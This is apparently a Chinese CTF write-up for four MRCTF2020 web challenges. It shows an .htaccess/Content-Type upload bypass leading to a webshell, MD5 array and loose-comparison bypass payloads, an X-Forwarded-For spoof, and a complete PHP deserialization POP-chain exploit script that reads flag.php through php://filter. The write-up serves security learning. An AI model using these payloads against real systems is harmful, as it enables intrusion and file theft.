[MRCTF2020] 你传你🐎呢#
知识点#
- .htaccess上传绕过
解题#
传.htaccess发现不太行,burp修改Content-Type为Image/jpeg成功上传,再上传一张jpg马就能直接连上了
[MRCTF2020] Ez_bypass#
知识点#
- md5比较漏洞
- 数字截取
解题#
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
$id=$_GET['id'];
$gg=$_GET['gg'];
if (md5($id) === md5($gg) && $id !== $gg) {
echo 'You got the first step';
if(isset($_POST['passwd'])) {
$passwd=$_POST['passwd'];
if (!is_numeric($passwd))
{
if($passwd==1234567)
{
echo 'Good Job!';
highlight_file('flag.php');
die('By Retr_0');
}
else
{
echo "can you think twice??";
}
}
else{
echo 'You can not get it !';
}
}
else{
die('only one way to get the flag');
}
}
else {
echo "You are not a real hacker!";
}
}
else{
die('Please input first');
}
}if (md5($id) === md5($gg) && $id !== $gg)
GET: id[]=1&gg[]=2passwd -> is_numeric -> ==1234567
POST: passwd=123456a
[MRCTF2020] PYWebsite#
解题#
直接看源码,访问flag.php,看到这句话
验证逻辑是在后端的,除了购买者和我自己,没有人可以看到flag
显然直接把X-Forwarded-For改成127.0.0.1就行了
Ezpop#
解题#
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}先分析下线索
- Modifier类中有
__invoke方法,可以尝试用函数的方式调用这个类来触发 - Show中有一个
__toString,再看到__construct方法中能用echo调用$this -> source,可以确定用自身调用自身来触发这个方法 - Test中有
__get,再加上Modifier中有一个protected属性的变量,确定用这个方法来访问$var - include能够用伪协议的方式来读取文件
总结以上,写出调用链
<?php
class Modifier {
protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
}
public function __toString(){
return $this->str->source;
}
}
class Test{
public $p;
}
$a = new Show("test");
$a -> str = new Test();
$a -> str -> p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));